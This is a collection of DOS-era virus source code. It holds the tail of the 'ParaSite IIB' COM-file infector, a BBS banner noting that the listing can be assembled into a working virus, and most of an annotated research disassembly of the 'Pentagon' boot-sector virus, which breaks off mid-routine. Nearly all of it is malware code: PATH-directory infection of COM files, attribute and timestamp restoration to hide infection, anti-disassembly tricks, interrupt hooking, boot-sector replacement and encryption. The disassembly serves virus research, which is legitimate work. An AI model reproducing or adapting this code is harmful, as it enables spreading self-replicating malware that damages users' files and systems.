        ADD     SI,env_str                                              
        LODSB                                                           
        MOV     CX,OFFSET 8000H                                         
        REPNZ   SCASB                                                   
        MOV     CX,4                                                    
                                                                        
check_next_4:                                                           
        LODSB                                                           
        SCASB                                                           
;                                                                       
; The JNZ line specifies that if there is no PATH present, then we will 
; along and infect the ROOT directory on the default drive.             
                                                                        
        JNZ     find_path               ;If not path, then go to ROOT di
        LOOP    check_next_4            ;Go back and check for more char
        POP     SI                      ;Load in PATH again to look for 
        POP     ES                                                      
        MOV     [SI+path_ad],DI                                         
        MOV     DI,SI                                                   
        ADD     DI,wrk_spc                                              
        MOV     BX,SI                                                   
        ADD     SI,wrk_spc              ;the File Handle                
        MOV     DI,SI                                                   
        JMP     SHORT   slash_ok                                        
                                                                        
set_subdir:                                                             
        CMP     WORD PTR [SI+path_ad],0                                 
        JNZ     found_subdir                                            
        JMP     all_done                                                
                                                                        
                                                                        
found_subdir:                                                           
        PUSH    DS                                                      
        PUSH    SI                                                      
        MOV     DS,ES:2CH                                               
        MOV     DI,SI                                                   
        MOV     SI,ES:[DI+path_ad]                                      
        ADD     DI,wrk_spc              ;DI is the handle to infect!    
                                                                        
                                                                        
move_subdir:                                                            
        LODSB                           ;To tedious work to move into su
        NOP                                                             
        CMP     AL,';'                  ;Does it end with a ; character?
        JZ      moved_one               ;if yes, then we found a subdir 
        CMP     AL,0                    ;is it the end of the path?     
        JZ      moved_last_one          ;if yes, then we save the PATH  
        STOSB                           ;marker into DI for future refer
        JMP     SHORT   move_subdir                                     
                                                                        
moved_last_one:                                                         
        MOV     SI,0                                                    
                                                                        
moved_one:                                                              
        POP     BX                      ;BX is where the virus data is  
        POP     DS                      ;Restore DS                     
        NOP                                                             
        MOV     [BX+path_ad],SI         ;Where is the next subdir?      
        CMP     CH,'\'                  ;Check to see if it ends in \   
        JZ      slash_ok                ;If yes, then it's OK           
        MOV     AL,'\'                  ;if not, then add one...        
        STOSB                           ;store the sucker               
                                                                        
                                                                        
                                                                        
slash_ok:                                                               
        MOV     [BX+nam_ptr],DI         ;Move the filename into workspac
        MOV     SI,BX                   ;Restore the original SI value  
        ADD     SI,f_spec               ;Point to COM file victim       
        MOV     CX,6                                                    
        REPZ    MOVSB                   ;Move victim into workspace     
hello:                                                                  
        MOV     SI,BX                                                   
        MOV     AH,4EH                                                  
        MOV     DX,wrk_spc                                              
        ADD     DX,SI                   ;DX is ... The File to infect   
        MOV     CX,3                    ;Attributes of Read Only or Hidd
        INT     21H                                                     
        JMP     SHORT   find_first                                      
joe1:                                                                   
        JMP     go                                                      
                                                                        
find_next:                                                              
        MOV     AH,4FH                                                  
        INT     21H                                                     
                                                                        
find_first:                                                             
        JNB     found_file              ;Jump if we found it            
        JMP     SHORT   set_subdir      ;Otherwise, get another subdirec
                                                                        
found_file:                                                             
        MOV     AX,[SI+dta_tim]         ;Get time from DTA              
        AND     AL,1EH                  ;Mask to remove all but seconds 
        CMP     AL,1EH                  ;60 seconds                     
        JZ      find_next                                               
        CMP     WORD PTR [SI+dta_len],OFFSET 0FA00H ;Is the file too LON
        JA      find_next               ;If too long, find another one  
        CMP     WORD PTR [SI+dta_len],0AH ;Is it too short?             
        JB      find_next               ;Then go find another one       
        MOV     DI,[SI+nam_ptr]                                         
        PUSH    SI                                                      
        ADD     SI,dta_nam                                              
                                                                        
more_chars:                                                             
        LODSB                                                           
        STOSB                                                           
        CMP     AL,0                                                    
        JNZ     more_chars                                              
        POP     SI                                                      
        MOV     AX,OFFSET 4300H                                         
        MOV     DX,wrk_spc                                              
        ADD     DX,SI                                                   
        INT     21H                                                     
        MOV     [SI+old_att],CX                                         
        MOV     AX,OFFSET 4301H                                         
        AND     CX,OFFSET 0FFFEH                                        
        MOV     DX,wrk_spc                                              
        ADD     DX,SI                                                   
        INT     21H                                                     
        MOV     AX,OFFSET 3D02H                                         
        MOV     DX,wrk_spc                                              
        ADD     DX,SI                                                   
        INT     21H                                                     
        JNB     opened_ok                                               
        JMP     fix_attr                                                
                                                                        
opened_ok:                                                              
        MOV     BX,AX                                                   
        MOV     AX,OFFSET 5700H                                         
        INT     21H                                                     
        MOV     [SI+old_tim],CX         ;Save file time                 
        MOV     [SI+ol_date],DX         ;Save the date                  
        MOV     AH,2CH                                                  
        INT     21H                                                     
        AND     DH,7                                                    
        JMP     infect                                                  
                                                                        
                                                                        
infect:                                                                 
        MOV     AH,3FH                                                  
        MOV     CX,3                                                    
        MOV     DX,first_3                                              
        ADD     DX,SI                                                   
        INT     21H             ;Save first 3 bytes into the data area  
        JB      fix_time_stamp                                          
        CMP     AX,3                                                    
        JNZ     fix_time_stamp                                          
        MOV     AX,OFFSET 4202H                                         
        MOV     CX,0                                                    
        MOV     DX,0                                                    
        INT     21H                                                     
        JB      fix_time_stamp                                          
        MOV     CX,AX                                                   
        SUB     AX,3                                                    
        MOV     [SI+jmp_dsp],AX                                         
        ADD     CX,OFFSET c_len_y                                       
        MOV     DI,SI                                                   
        SUB     DI,OFFSET c_len_x                                       
        JMP     CONT                                                    
JOE2:                                                                   
        JMP     JOE1                                                    
CONT:                                                                   
        MOV     [DI],CX                                                 
        MOV     AH,40H                                                  
        MOV_CX  virlen                                                  
        MOV     DX,SI                                                   
        SUB     DX,OFFSET codelen                                       
        INT     21H                                                     
        JB      fix_time_stamp                                          
        CMP     AX,OFFSET virlen                                        
        JNZ     fix_time_stamp                                          
        MOV     AX,OFFSET 4200H                                         
        MOV     CX,0                                                    
        MOV     DX,0                                                    
        INT     21H                                                     
        JB      fix_time_stamp                                          
        MOV     AH,40H                                                  
        MOV     CX,3                                                    
        MOV     DX,SI                                                   
        ADD     DX,jmp_op                                               
        INT     21H                                                     
                                                                        
fix_time_stamp:                                                         
        MOV     DX,[SI+ol_date]                                         
        MOV     CX,[SI+old_tim]                                         
        AND     CX,OFFSET 0FFE0H                                        
        OR      CX,1EH                                                  
        MOV     AX,OFFSET 5701H                                         
        INT     21H                                                     
        MOV     AH,3EH                                                  
        INT     21H                                                     
                                                                        
fix_attr:                                                               
        MOV     AX,OFFSET 4301H                                         
        MOV     CX,[SI+old_att]                                         
        MOV     DX,wrk_spc                                              
        ADD     DX,SI                                                   
        INT     21H                                                     
                                                                        
all_done:                                                               
        PUSH    DS                                                      
        MOV     AH,1AH                                                  
        MOV     DX,[SI+old_dta]                                         
        MOV     DS,[SI+old_dts]                                         
        INT     21H                                                     
        POP     DS                                                      
                                                                        
quit:                                                                   
        MOV     BX,OFFSET count                                         
        CMP     BX,0                                                    
        JB      joe2                                                    
        POP     CX                                                      
        XOR     AX,AX                   ;XOR values so that we will give
        XOR     BX,BX                   ;poor sucker a hard time trying 
        XOR     DX,DX                   ;reassemble the source code if h
        XOR     SI,SI                   ;decides to dissassemble us.    
        MOV     DI,OFFSET 0100H                                         
        PUSH    DI                                                      
        XOR     DI,DI                                                   
        RET     0FFFFH                  ;Return back to the beginning   
                                        ;of the program                 
                                                                        
vir_dat EQU     $                                                       
                                                                        
Aurther DB      "ParaSite IIB - By: Rock Steady"                        
olddta_ DW      0                                                       
olddts_ DW      0                                                       
oldtim_ DW      0                                                       
count_  DW      0                                                       
oldate_ DW      0                                                       
oldatt_ DW      0                                                       
first3_ EQU     $                                                       
        INT     20H                                                     
        NOP                                                             
jmpop_  DB      0E9H                                                    
jmpdsp_ DW      0                                                       
fspec_  DB      '*.COM',0                                               
fipec_  DB      'COMMAND.COM',0                                         
pathad_ DW      0                                                       
namptr_ DW      0                                                       
envstr_ DB      'PATH='                                                 
wrkspc_ DB      40h dup (0)                                             
dta_    DB      16h dup (0)                                             
dtatim_ DW      0,0                                                     
dtalen_ DW      0,0                                                     
dtanam_ DB      0Dh dup (0)                                             
buffer  DB      0CDh, 20h, 0, 0, 0, 0, 0, 0                             
orig_path DB    64 dup (?)                                              
root_dir DB     '\',0                                                   
lst_byt EQU     $                                                       
virlen  =       lst_byt - v_start                                       
codelen =       vir_dat - v_start                                       
c_len_x =       vir_dat - v_start - 2                                   
c_len_y =       vir_dat - v_start + 100H                                
old_dta =       olddta_ - vir_dat                                       
old_dts =       olddts_ - vir_dat                                       
old_tim =       oldtim_ - vir_dat                                       
ol_date =       oldate_ - vir_dat                                       
old_att =       oldatt_ - vir_dat                                       
first_3 =       first3_ - vir_dat                                       
jmp_op  =       jmpop_  - vir_dat                                       
jmp_dsp =       jmpdsp_ - vir_dat                                       
f_spec  =       fspec_  - vir_dat                                       
f_ipec  =       fipec_  - vir_dat                                       
path_ad =       pathad_ - vir_dat                                       
nam_ptr =       namptr_ - vir_dat                                       
env_str =       envstr_ - vir_dat                                       
wrk_spc =       wrkspc_ - vir_dat                                       
dta     =       dta_    - vir_dat                                       
dta_tim =       dtatim_ - vir_dat                                       
dta_len =       dtalen_ - vir_dat                                       
dta_nam =       dtanam_ - vir_dat                                       
count   =       count_  - vir_dat                                       
         CODE    ENDS                                                   
END     VCODE

;****************************************************************************;
;                                                                            ;
;                     -=][][][][][][][][][][][][][][][=-                     ;
;                     -=]  P E R F E C T  C R I M E  [=-                     ;
;                     -=]      +31.(o)79.426o79      [=-                     ;
;                     -=]                            [=-                     ;
;                     -=] For All Your H/P/A/V Files [=-                     ;
;                     -=]    SysOp: Peter Venkman    [=-                     ;
;                     -=]                            [=-                     ;
;                     -=]      +31.(o)79.426o79      [=-                     ;
;                     -=]  P E R F E C T  C R I M E  [=-                     ;
;                     -=][][][][][][][][][][][][][][][=-                     ;
;                                                                            ;
;                    *** NOT FOR GENERAL DISTRIBUTION ***                    ;
;                                                                            ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed  ;
; Around Among the General Public. It Will be Very Useful for Learning how   ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can    ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding     ;
; Experience can Turn it Into a far More Malevolent Program Than it Already  ;
; Is. Keep This Code in Responsible Hands!                                   ;
;                                                                            ;
;****************************************************************************;
    page    65,132
    title    The 'Pentagon' Virus
; ЙНННННННННННННННННННННННННННННННННННННННННННННННННННННННННННННННННННННННННН»
; є                 British Computer Virus Research Centre                   є
; є  12 Guildford Street,   Brighton,   East Sussex,   BN1 3LS,   England    є
; є  Telephone:     Domestic   0273-26105,   International  +44-273-26105    є
; є                                                                          є
; є                          The 'Pentagon' Virus                            є
; є                Disassembled by Joe Hirst,      March 1989                є
; є                                                                          є
; є                      Copyright (c) Joe Hirst 1989.                       є
; є                                                                          є
; є      This listing is only to be made available to virus researchers      є
; є                or software writers on a need-to-know basis.              є
; ИННННННННННННННННННННННННННННННННННННННННННННННННННННННННННННННННННННННННННј

    ; The disassembly has been tested by re-assembly using MASM 5.0.

    ; The code section between offsets 59H and C4H (which is normally
    ; encrypted) appears to have been separately assemblied using A86.

    ; Virus is possibly an honorary term, at least for this sample,
    ; as all attempts to run it have so far failed.

    ; This virus consists of a boot sector and two files.
    ; The boot sector is a normal PCDOS 3.20 boot sector with three
    ; changes:

    ; 1.    The OEM name 'IBM' has been changed to 'HAL'.

    ; 2.    The first part of the virus code overwrites 036H to 0C5H.

    ; 3.    100H-122H has been overwritten by a character string.

    ; The name of the first file is the hex character 0F9H.  This file
    ; contains the rest of the virus code followed by the original boot
    ; sector.

    ; The name of the second file is PENTAGON.TXT.  This file does not
    ; appear to be used in any way or contain any meaningful data.

    ; Both files are created without the aid of DOS, and the first
    ; file is accessed by its stored absolute location.

    ; Four different sections of the virus are separately encrypted:

    ; 1.    004AH - 004BH, key 0ABCDH - load decryption key

    ; 2.    0059H - 00C4H, key 0FCH - rest of virus code in boot sector.

    ; 3.    0791H - 07DFH, key 0AAH - the file name and copyright message.

    ; 4.    0800H - 09FFH, key 0FCH - the original boot sector.

SEG70    SEGMENT AT 70H
    ASSUME    CS:SEG70
EXIT:
SEG70    ENDS

BOOT    SEGMENT AT 0

    ORG    413H
BW0413    DW    ?

    ORG    417H
BB0417    DB    ?

    ORG    51CH
BW051C    DW    ?

    ORG    7C0BH
DW7C0B    DW    ?

    ORG    7C18H
DW7C18    DW    ?
DW7C1A    DW    ?

    ORG    7C2AH
DB7C2A    DB    ?

    ORG    7C37H
DW7C37    DW    ?
DW7C39    DW    ?
DB7C3B    DB    ?
DB7C3C    DB    ?
DW7C3D    DW    ?

    ORG    7DB7H
DB7DB7    DB    ?

    ORG    7DFDH
DB7DFD    DB    ?

    ORG    7E00H
DW7E00    DW    ?        ; DW008F - Track and sector of rest of code
DW7E02    DW    ?        ; DW0091 - Head and drive of rest of code
DW7E04    DW    ?        ; DW0093 - Segment address of virus

BOOT    ENDS

CODE    SEGMENT BYTE PUBLIC 'CODE'
    ASSUME CS:CODE,DS:CODE

    IF1
    ORG    206H
BP0095X    LABEL    NEAR
    ENDIF

    ORG    0
START:    JMP    BP0036

    DB    'HAL  3.2'

    DW    512        ; BPB001 - Bytes per sector
    DB    2        ; BPB002 - Sectors per allocation unit
    DW    1        ; BPB003 - Reserved sectors
    DB    2        ; BPB004 - Number of FATs
    DW    112        ; BPB005 - Number of root dir entries
    DW    720        ; BPB006 - Number of sectors
    DB    0FDH        ; BPB007 - Media Descriptor
    DW    2        ; BPB008 - Number of sectors per FAT
    DW    9        ; BPB009 - Sectors per track
    DW    2        ; BPB010 - Number of heads
    DW    0        ; BPB011 - Number of hidden sectors (low order)
BPB012    DW    0            ; Number of hidden sectors (high order)

    DB    10 DUP (0)

HEADNO    DB    0

    ; Interrupt 30 (1EH) - Disk parameter table

DSKTAB    DB    4 DUP (0), 0FH, 4 DUP (0)

    DB    1, 0

BP0036:    CLI
    MOV    AX,CS            ; \ Set SS to CS
    MOV    SS,AX            ; /
    MOV    SP,0F000H        ; Set stack pointer
    MOV    DS,AX            ; Set DS to CS
    STI
    MOV    BP,OFFSET BP0044+7C00H
BP0044:    XOR    WORD PTR [BP+6],0ABCDH    ; Decrypt key instruction
    NOP
DW004A    EQU    THIS WORD
    MOV    DH,0FCH            ; Decryption key
    MOV    BP,OFFSET BP0059+7C00H    ; Decryption start address
    MOV    CX,OFFSET DB00C5-BP0059    ; Length to decrypt
BP0052:    XOR    [BP+00],DH        ; Decrypt a byte
    INC    BP            ; Next byte
    LOOP    BP0052            ; Repeat for all of it
    NOP
BP0059:    XOR    DW004A+7C00H,0ABCDH    ; Re-encrypt key instruction
    MOV    AX,BW0413        ; Get RAM size in K
    SUB    AX,0005            ; Subtract five K
    MOV    BW0413,AX        ; Replace amended RAM size
    MOV    CL,06            ; Bits to move
    SHL    AX,CL            ; Convert to segment address
    MOV    DW0093+7C00H,AX        ; Save segment address
    NOP
    MOV    ES,AX            ; Set ES to this segment
    XOR    DI,DI            ; Move to start
    MOV    SI,7C00H        ; From start of boot sector buffer
    MOV    CX,0200H        ; Move one sector
    CLD
    REPZ    MOVSB            ; Move sector to high-core
    NOP

    ; Move next section of code to a safe area

    MOV    DI,200H+7C00H
    MOV    SI,OFFSET DW008F+7C00H
    MOV    CX,OFFSET DB00C5-DW008F    ; Length to move
    PUSH    DS            ; \ Set ES to DS
    POP    ES            ; /
    CLD
    REPZ    MOVSB            ; Copy program section
    JMP    BP0095X            ; This is BP0095 in new location

DW008F    DW    0B02H            ; Track and sector of rest of code
DW0091    DW    100H            ; Head and drive of rest of code
DW0093    DW    9EC0H            ; Segment address of virus

BP0095:    MOV    CX,0004            ; Number of retries
BP0098:    PUSH    CX
    MOV    CX,DW7E00        ; Get track and sector number
    MOV    DX,DW7E02        ; Get head and drive number
    MOV    ES,DW7E04        ; Get buffer segment address
    MOV    BX,0200H        ; Buffer offset
    MOV    AX,0201H        ; Read one sector
    INT    13H            ; Disk I/O
    JNB    BP00B8            ; Branch if no error
    POP    CX
    XOR    AH,AH            ; Reset floppy disk sub-system
    INT    13H            ; Disk I/O
    LOOP    BP0098            ; Retry
    INT    18H            ; Drop into basic

BP00B8:    POP    CX
    MOV    AX,OFFSET DW7E04        ; Address segment address
    CLI
    MOV    SP,AX            ; Point SP at segment address
    STI
    MOV    AX,0200H        ; \ Address of second section
    PUSH    AX            ; /
    RETF

DB00C5    DB    50H

    ; The rest of this sector is a normal PCDOS 3.20 boot sector
    ; which has been overwritten at 100H-122H by a character string

    DB    61H, 0

    XOR    AH,AH
    INT    16H
    POP    SI
    POP    DS
    POP    [SI]

DW00D0    DW    0B06H            ; Track and sector numbers
DW00D2    DW    0100H            ; Head and drive numbers
    DB    19H

    MOV    SI,OFFSET DB7DB7
    JMP    NEAR PTR DB00C5

    MOV    AX,BW051C
    XOR    DX,DX
    DIV    DW7C0B
    INC    AL
    MOV    DB7C3C,AL
    MOV    AX,DW7C37
    MOV    DW7C3D,AX
    MOV    BX,0700H
    MOV    AX,DW7C37
    CALL    BP0137
    MOV    AX,DW7C18
    SUB    AL,DB7C3B
    INC    AX
    PUSH    AX

    DB    '(c) 1987 The Pentagon, Zorell Group'

    DB    7CH
    JMP    FAR PTR EXIT

BP0129:    LODSB
    OR    AL,AL
    JZ    BP0150
    MOV    AH,0EH
    MOV    BX,7
    INT    10H
    JMP    BP0129

BP0137:    XOR    DX,DX
    DIV    DW7C18
    INC    DL
    MOV    DB7C3B,DL
    XOR    DX,DX
    DIV    DW7C1A
    MOV    DB7C2A,DL
    MOV    DW7C39,AX
BP0150:    RET

    MOV    AH,2
    MOV    DX,DW7C39
    MOV    CL,6
    SHL    DH,CL
    OR    DH,DB7C3B
    MOV    CX,DX
    XCHG    CH,CL
    MOV    DL,DB7DFD
    MOV    DH,DB7C2A
    INT    13H
    RET

    DB    0DH, 0AH, 'Non-System disk or disk error', 0DH, 0AH
    DB    'Replace and strike any key when ready', 0DH, 0AH, 0
    DB    0DH, 0AH, 'Disk Boot failure', 0DH, 0AH, 0
    DB    'IBMBIO  COMIBMDOS  COM'

    ORG    01FEH
    DW    0AA55H

    ; Second sector of virus

BP0200:    CLI
    MOV    SP,0F000H        ; Reset stack pointer
    STI
    XOR    AX,AX            ; \ Address zero
    MOV    DS,AX            ; /
    MOV    BX,004CH        ; INT 13H jump address
    MOV    BP,01A0H        ; INT 68H jump address
    CMP    WORD PTR DS:[BP+0],0    ; Is INT 68H in use
    JE    BP0219            ; Branch if not
    JMP    BP024E

BP0219:    MOV    AX,[BX]            ; Get INT 13H offset
    MOV    DS:[BP+0],AX        ; Set INT 68H to this offset
    MOV    AX,[BX+2]        ; Get INT 13H segment
    MOV    DS:[BP+2],AX        ; Set INT 68H to this segment
    MOV    WORD PTR [BX],OFFSET BP04C4    ; Set address of INT 13H routine
    MOV    AX,CS            ; \ Set INT 13H segment
    MOV    [BX+2],AX        ; /
    MOV    BX,0024H        ; INT 9 jump address
    MOV    BP,01A4H        ; INT 69H jump address
    MOV    AX,[BX]            ; Get INT 9 offset
    MOV    DS:[BP],AX        ; Set INT 69H to this offset
    MOV    AX,[BX+2]        ; Get INT 9 segment
    MOV    DS:[BP+2],AX        ; Set INT 69H to this segment
    MOV    WORD PTR [BX],OFFSET BP0709    ; Set address of INT 9 routine
    MOV    AX,CS            ; \ Set INT 9 segment
    MOV    [BX+02],AX        ; /
    JMP    BP0254

BP024E:    MOV    BX,OFFSET BW0413    ; Address size of RAM
    ADD    WORD PTR [BX],5        ; Restore the 5K
BP0254:    MOV    BP,OFFSET DW008F    ; Address virus pointer
    MOV    CX,CS:[BP]        ; Get track and sector
    MOV    DX,CS:[BP+2]        ; Get head and device
    MOV    BX,0200H        ; Address second sector
    MOV    CX,3            ; Three sectors to read
BP0265:    PUSH    CX            ; Save read count
    MOV    AX,0201H        ; Read one sector
    MOV    CX,CS:[BP]        ; Get track and sector
    CALL    BP0300            ; Address to next sector
    MOV    CS:[BP],CX        ; Save new track and sector
    ADD    BX,0200H        ; Address next buffer area
    CALL    BP031B            ; Read from disk
    JNB    BP0280            ; Branch if no error
    POP    CX
    INT    18H            ; Drop into basic

    ; Read file, first sector

BP0280:    POP    CX            ; Retrieve read count
    LOOP    BP0265            ; Repeat for other sectors
    MOV    BP,OFFSET DW00D0    ; Address file pointers
    MOV    CX,CS:[BP]        ; Get track and sector
    MOV    DX,CS:[BP+2]        ; Get head and drive
    MOV    BX,1000H        ; Buffer address
    MOV    AX,0201H        ; Read one sector
    CALL    BP031B            ; Read from disk
    JNB    BP029B            ; Branch if no error
    INT    18H            ; Drop into basic

    ; Read file, second sector

BP029B:    CALL    BP0300            ; Address to next sector
    ADD    BX,0200H        ; Update buffer address
    MOV    AX,0201H        ; Read one sector
    CALL    BP031B            ; Read from disk
    JNB    BP02AC            ; Branch if no error
    INT    18H            ; Drop into basic

BP02AC:    LEA    CX,DB07E0        ; Address end of encrypted
    LEA    BX,DB0791        ; Address start of encrypted
    SUB    CX,BX            ; Length to decrypt
    MOV    AL,0AAH            ; Load encryption key
    PUSH    CS            ; \ Set DS to CS
    POP    DS            ; /
    CALL    BP0315            ; Decrypt
    MOV    AX,CS            ; \
    MOV    ES,AX            ;  ) Set ES & DS to CS
    MOV    DS,AX            ; /
    MOV    DI,0100H        ; Middle of 1st sector
    MOV    SI,OFFSET DB07BC    ; Address copyright message
    MOV    CX,0023H        ; Length of copyright message
    REPZ    MOVSB            ; Copy copyright message
    PUSH    CS            ; \ Set DS to CS
    POP    DS            ; /
    MOV    CX,0200H        ; Length to decrypt
    MOV    BX,0800H        ; Address boot sector store
    MOV    AL,0FCH            ; Load encryption key
    CALL    BP0315            ; Decrypt
    XOR    AX,AX            ; \ Segment zero
    MOV    ES,AX            ; /
    MOV    DI,7C00H        ; Boot sector buffer
    MOV    SI,0800H        ; Address boot sector store
    MOV    CX,0200H        ; Sector length
    CLD
    REPZ    MOVSB            ; Copy boot sector
    DB    0EAH            ; Far jump to boot sector
    DW    7C00H, 0

    DB    16 DUP (0)

    ; Address to next sector

BP0300:    INC    CL            ; Increment sector number
    CMP    CL,0AH            ; Is it sector ten?
    JL    BP0314            ; Branch if not
    MOV    CL,1            ; Set sector to one
    INC    DH            ; Increment head
    CMP    DH,2            ; Is it head two?
    JL    BP0314            ; Branch if not
    XOR    DH,DH            ; Set head to zero
    INC    CH            ; Increment track
BP0314:    RET

    ; Encrypt/decrypt

BP0315:    XOR    [BX],AL            ; Encrypt a byte
    INC    BX            ; Address next byte
    LOOP    BP0315            ; Repeat for count
    RET

    ; Read from or write to disk

BP031B:    PUSH    SI
    PUSH    DI
    MOV    SI,AX            ; Save function
    MOV    DI,CX            ; Save track and sector
    MOV    CX,3            ; Number of retries
BP0324:    PUSH    CX
    MOV    AX,SI            ; Retrieve function
    MOV    CX,DI            ; Retrieve track and sector
    INT    68H            ; Disk I/O
    JNB    BP0338            ; Branch if no error
    XOR    AH,AH            ; Reset sub-system
    INT    68H            ; Disk I/O
    POP    CX            ; Retrieve number of retries
    LOOP    BP0324            ; Retry
    STC
    JMP    BP033B

BP0338:    POP    CX            ; Retrieve number of retries
    MOV    CX,DI            ; Retrieve track and sector
BP033B:    POP    DI
    POP    SI
    RET

    ; Find unused FAT entry pair

BP033E:    PUSH    AX
    PUSH    DX
    PUSH    ES
    PUSH    DI
    PUSH    CS
    POP    ES
    MOV    DX,CX            ; Initial cluster number
    XOR    AL,AL            ; Search for zero
BP0348:    MOV    CX,3            ; Three bytes to check
    MOV    DI,BX            ; Address FAT entry pair
    REPZ    SCASB            ; Scan for non-zero
    CMP    CX,0            ; Is FAT pair unused
    JE    BP0361            ; Branch if yes
    ADD    BX,3            ; Address next entry pair
    ADD    DX,2            ; Update entry count
    CMP    DX,0162H        ; Entry 354?
    JLE    BP0348            ; Process entry pair if not
    STC
BP0361:    MOV    CX,DX            ; Cluster number found
    POP    DI
    POP    ES
    POP    DX
    POP    AX
    RET

    ; Find and flag an unused entry

BP0368:    TEST    WORD PTR [BX],0FFFH    ; Test first FAT entry
    JZ    BP0384            ; Branch if unused
    INC    CX            ; Next entry number
    INC    BX            ; Address 2nd entry
    TEST    WORD PTR [BX],0FFF0H    ; Test second FAT entry
    JZ    BP038B            ; Branch if unused
    INC    CX            ; Next entry number
    ADD    BX,2            ; Address next entry pair
    CMP    CX,0163H        ; Entry 355?
    JLE    BP0368            ; Process next FAT pair if not
    STC
    JMP    BP0390

BP0384:    OR    WORD PTR [BX],0FFFH    ; Flag 1st FAT entry EOF
    JMP    BP038F

BP038B:    OR    WORD PTR [BX],0FFF0H    ; Flag 2nd FAT entry EOF
    nop                ; ** length adjustment, MASM 5.0
BP038F:    CLC
BP0390:    RET

    ; Unflag Brain virus bad clusters

BP0391:    PUSH    AX
    PUSH    BX
    PUSH    CX
    PUSH    DX
    MOV    DX,CX
BP0397:    MOV    AX,[BX]            ; Get FAT entry
    AND    AX,0FFFH        ; Isolate FAT entry
    CMP    AX,0FF7H        ; Bad cluster?
    JE    BP03B8            ; Branch if yes
    INC    DX            ; Add to cluster number
    INC    BX            ; Address next entry
    MOV    AX,[BX]            ; Get FAT entry
    MOV    CL,4            ; Bits to move
    SHR    AX,CL            ; Move FAT entry
    CMP    AX,0FF7H        ; Bad Cluster?
    JE    BP03C8            ; Branch if yes
    INC    DX            ; Add to cluster number
    ADD    BX,2            ; Address next pair of entries
    CMP    DX,015FH        ; Entry 351?
    JLE    BP0397            ; Process this pair if not
BP03B8:    MOV    WORD PTR [BX],0        ; \
    MOV    BYTE PTR [BX+2],0    ;  ) Clear three entries
    XOR    WORD PTR [BX+3],0FF7H    ; /
    JMP    BP03D5

BP03C8:    XOR    WORD PTR [BX],0FF7H    ; \
    MOV    WORD PTR [BX+2],0    ;  ) Clear three entries
    MOV    BYTE PTR [BX+4],0    ; /
BP03D5:    POP    DX
    POP    CX
    POP    BX
    POP    AX
    RET

    ; Convert cluster number to track, head and sector

BP03DA:    PUSH    AX
    PUSH    BX
    SUB    CX,2            ; Subtract number of 1st cluster
    ADD    CX,CX            ; Two sectors per cluster
    ADD    CX,0CH            ; Add sector num of 1st cluster
    MOV    AX,CX            ; Copy sector number
    PUSH    AX            ; Save sector number
    MOV    BL,9            ; Nine sectors per track
    DIV    BL            ; Divide by sectors per track
    INC    AH            ; First sector is one
    MOV    CL,AH            ; Move sector number
    XOR    AH,AH            ; Clear top of register
    MOV    BL,2            ; Two heads
    DIV    BL            ; Divide by heads
    MOV    DH,AH            ; Move head number
    POP    AX            ; Retrieve sector number
    MOV    BL,12H            ; 18 sectors per track (both sides)
    DIV    BL            ; Divide by sectors per track
    MOV    CH,AL            ; Move track number
    POP    BX
    POP    AX
    RET

    ; Update directory

BP0401:    PUSH    BX
    PUSH    CX
    PUSH    DX
    PUSH    SI
    PUSH    DI
    MOV    CX,000FH        ; Fifteen entries per sector
    XOR    DI,DI            ; Start of sector
    CMP    AX,7            ; Is this first dir sector
    JNE    BP0416            ; Branch if not
    SUB    CX,3            ; Subtract three from count
    ADD    DI,60H            ; Address fourth entry
BP0416:    CMP    BYTE PTR CS:DB07E1,0FFH    ; Is Brain switch on?
    JNE    BP0443            ; Branch if not
    CMP    BYTE PTR ES:[BX+DI+0BH],8 ; Is it volume label?
    JNE    BP0443            ; Branch if not
    MOV    BYTE PTR CS:DB07E2,0FFH    ; Set directory update switch on
    PUSH    SI
    PUSH    DI
    PUSH    CX
    ADD    DI,BX            ; Add sector address
    LEA    SI,DB07B1        ; Address label
    MOV    CX,000BH        ; Length of new label
    CLD
    REPZ    MOVSB            ; Copy label
    MOV    BYTE PTR CS:DB07E1,0    ; Set Brain switch off
    POP    CX
    POP    DI
    POP    SI
BP0443:    CMP    BYTE PTR ES:[BX+DI],0    ; Is entry unused?
    JE    BP0452            ; Branch if yes
    ADD    DI,20H            ; Address next entry
    LOOP    BP0416            ; Process next entry
    STC
    JMP    BP0487

BP0452:    ADD    DI,BX            ; Add sector address
    MOV    BX,DI            ; Move entry address
    MOV    BYTE PTR [BX],0F9H    ; "Filename"
    MOV    BYTE PTR [BX+0BH],23H    ; Read-only, hidden attributes
    MOV    CX,CS:DW0784        ; Get virus cluster number
    MOV    [BX+1AH],CX        ; Store starting cluster
    MOV    WORD PTR [BX+1CH],0800H    ; \ File size 2048
    MOV    WORD PTR [BX+1EH],0    ; /
    ADD    DI,20H            ; Address next entry
    MOV    BX,DI            ; Move entry address
    LEA    SI,DB0791        ; Address start of encrypted
    MOV    CX,0020H        ; One complete entry to move
    CLD
    REPZ    MOVSB            ; Move entry
    MOV    CX,CS:DW0786        ; Get file cluster number
    MOV    [BX+1AH],CX        ; Store starting cluster
    CLC
BP0487:    POP    DI
    POP    SI
    POP    DX
    POP    CX
    POP    BX
    RET

    ; Read actual boot sector - Brain infected

BP048D:    PUSH    AX
    PUSH    CX
    PUSH    DX
    MOV    CX,[BX+7]        ; Get track and sector
    MOV    DH,[BX+6]        ; Get head number
    MOV    AX,0201H        ; Read one sector
    CALL    BP031B            ; Read from disk
    POP    DX
    POP    CX
    POP    AX
    RET

    ; Generate a sound

BP04A0:    MOV    BP,1            ; One loop
    MOV    AL,0B6H            ; Counter two, both bytes, sq wave
    OUT    43H,AL            ; Set PIT control register
    MOV    AX,0533H        ; Sound frequency
    OUT    42H,AL            ; Send first byte
    MOV    AL,AH            ; Get second byte
    OUT    42H,AL            ; Send second byte
    IN    AL,61H            ; Get port B
    MOV    AH,AL            ; Save port B value
    OR    AL,3            ; Set sound bits on
    OUT    61H,AL            ; Send port B
    SUB    CX,CX            ; Maximum loop count
BP04BA:    LOOP    BP04BA            ; Delay
    DEC    BP            ; Decrement count of loops
    JNZ    BP04BA            ; Branch if not zero (it won't be)
    MOV    AL,AH            ; Recover original port B
    OUT    61H,AL            ; Send port B
    RET

    ; Int 13H routine

BP04C4:    STI
    PUSH    AX
    PUSH    BX
    PUSH    CX
    PUSH    DX
    PUSH    DS
    PUSH    SI
    PUSH    ES
    PUSH    DI
    MOV    CS:DB0790,DL        ; Save device
    CMP    AH,2            ; Is function a read?
